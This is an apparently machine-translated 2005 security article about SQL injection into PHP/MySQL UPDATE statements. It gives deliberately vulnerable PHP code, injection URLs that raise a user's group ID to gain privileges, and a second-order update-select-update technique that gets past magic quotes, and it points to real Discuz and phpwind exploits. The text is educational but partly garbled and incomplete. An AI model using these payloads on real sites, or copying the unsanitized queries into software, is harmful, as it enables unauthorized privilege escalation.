Two modes of update injection (mysql+php)
Article/Security Angel · Superhei 2005.8.11
A. Test environment:
Os:windowsxp SP2
php:php 4.3.10 (
MySQL 4.1.9
Apache 1.3.33
Two. Test database structure:
-----Start---
--Database: ' Test '
--
The script only modifies user= ' heige ' pass, if Groudid represents the user's permission level, our aim is to construct $p to reach
To modify the purpose of GroupID:
Then we submit: http://127.0.0.1/test1.php?p=123456,groudid=1
In MySQL query:
Mysql> select * from UserInfo;
+---------+-------+--------+
| Groudid | user | Pass |
+---------+-------+--------+
| 1 | Heige | 123456 |
+---------+-------+--------+
1 row in Set (0.01 sec)
The user Heige Groudid 2 to 1:)
So we can get no "or" "Update" injection to be successful, this is our mode 1.
In order to close ' we construct $p should be submitted for 123456 ', groudid= ' 2:
http://127.0.0.1/test2.php?p=123456 ', groudid= ' 1 in the case of Gpc=on ' became \ '
The submitted statement becomes: SQL query:update userinfo set pass= ' 123456\ ', groudid=\ ' 1 ' where user= ' Heige '
MySQL query:
Mysql> select * from UserInfo;
+---------+-------+--------------------+
| Groudid | user | Pass |
+---------+-------+--------------------+
| 2 | Heige | 123456 ', groudid= ' 1 |
+---------+-------+--------------------+
1 row in Set (0.00 sec)
Groudid has not been modified. So when the variable is ' or ', it's not injected at all? Not below we look at Mode 2:
Mysql_connect ($servername, $dbusername, $dbpassword) or Die ("database connection failed");
$sql = "Update userinfo set pass= ' $p ' where user= ' heige ';//<--$P use single quotes
$result = Mysql_db_query ($dbname, $sql);
Mysql_fetch_array ($result); $p data is written to the database
$sql = "Select pass from UserInfo where user= ' Heige '";
$result = Mysql_db_query ($dbname, $sql);
$userinfo =mysql_fetch_array ($result);
echo $userinfo [0]; Export pass query to $userinfo[0]
$sql = "Update userinfo set pass= ' $userinfo [0] ' where user= ' heige '";
$result = Mysql_db_query ($dbname, $sql);
Mysql_fetch_array ($result); Update the $userinfo[0] again
?>
We test under, submit: http://127.0.0.1/test3.php?p=123456 ', groudid= ' 1
Back to the MySQL query:
Mysql> select * from UserInfo;
+---------+-------+--------+
| Groudid | user | Pass |
+---------+-------+--------+
| 1 | Heige | 123456 |
+---------+-------+--------+
1 row in Set (0.00 sec)
haha~~ successfully injected modified Groudid to 1. This is our Model 2, the simple description is as follows:
Update-->select-->update
Four. Actual mode
Model 1:discuz 2.0/2.2 register.php Injection
Vulnerability Analysis: http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote exploit:http://4ngel.net/project/discuz_reg.htm
Pattern 2:phpwind 2.0.2 and 3.31e privilege elevation vulnerability
Vulnerability Analysis:
Update (profile.php injection variable for $proicon UPDATE statement, icon= ' $userdb [icon] ')
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.